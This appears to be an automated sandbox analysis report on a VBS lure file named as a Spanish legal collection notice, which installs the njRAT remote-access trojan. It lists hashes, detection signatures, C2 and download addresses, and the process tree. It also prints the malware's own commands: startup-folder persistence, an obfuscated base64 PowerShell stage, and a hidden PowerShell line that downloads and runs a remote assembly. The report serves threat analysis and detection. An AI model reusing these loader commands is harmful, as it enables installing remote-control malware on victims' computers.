Analysis
-
max time kernel
300s -
max time network
304s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
04-01-2022 17:37
Static task
static1
Behavioral task
behavioral1
Sample
Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs
Resource
win7-en-20211208
General
-
Target
Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs
-
Size
151KB
-
MD5
375043101c2b371e5db90b0abdb0379d
-
SHA1
8ca125b715a2f166ae8d24c87264f9beb4ddda6b
-
SHA256
fffd645e0ed3e653627764842ea17cb464bae80ef48ddb3dbe54d1eddf6b1bb9
-
SHA512
582ad71b82c9fd666a5c26738264aded5d226e1a2417f30e55f4b258c3c111caf18b15dcf9d0ffb48c1fa96a996a845cd9e64357925b0f29939252085d6ff416
Malware Config
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted
njrat
0.7NC
NYAN CAT
revg.duckdns.org:57831
ebef4abe57d24e8
-
reg_key
ebef4abe57d24e8
-
splitter
@!#&^%$
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 22 3096 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3096 set thread context of 1544 3096 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3976 powershell.exe 3976 powershell.exe 3976 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 3096 powershell.exe 3096 powershell.exe 3096 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
RegSvcs.exepid process 1544 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 4456 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe Token: 33 1544 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1544 RegSvcs.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.execmd.exepowershell.exepowershell.exedescription pid process target process PID 3380 wrote to memory of 3752 3380 WScript.exe cmd.exe PID 3380 wrote to memory of 3752 3380 WScript.exe cmd.exe PID 3752 wrote to memory of 3076 3752 cmd.exe PING.EXE PID 3752 wrote to memory of 3076 3752 cmd.exe PING.EXE PID 3752 wrote to memory of 3976 3752 cmd.exe powershell.exe PID 3752 wrote to memory of 3976 3752 cmd.exe powershell.exe PID 3380 wrote to memory of 4456 3380 WScript.exe powershell.exe PID 3380 wrote to memory of 4456 3380 WScript.exe powershell.exe PID 4456 wrote to memory of 3096 4456 powershell.exe powershell.exe PID 4456 wrote to memory of 3096 4456 powershell.exe powershell.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1544 3096 powershell.exe RegSvcs.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')2⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
PID:3076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1544
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
MD5
269f57a12a6488987deb408ba69b46e2
SHA1636ddfff17659f4c547c0149f934b69d9910b25d
SHA256b563ea8391e80c1cee60a076396e7befd0957b335a6f73fe0f2e898296c6001b
SHA5126de4eac4d310f8d52a99ee055ef9a9da61d89eb215edc917e51fdb4af28534732c149d9ab33929f77b2524621948720397c322ce6348ab1ffb159bb6a711409f
-
MD5
223a05cfe231f69fafc4878b9e804a4c
SHA19e90c30a33c8e2ddbb6246c37d567fd36db11223
SHA256f2e6a9ec22cb8e3af31c8600ab109b76e17386fe8cd41f70ff67af4a91dec221
SHA51202280c1479baa0a85476c74a6d661ffb9db71fe1c2eb321e42dcfbfcab684210604ba1cf83314d6bfcce04ec0c4d1e20e17a487dc6373c7e63b60f6eddb09499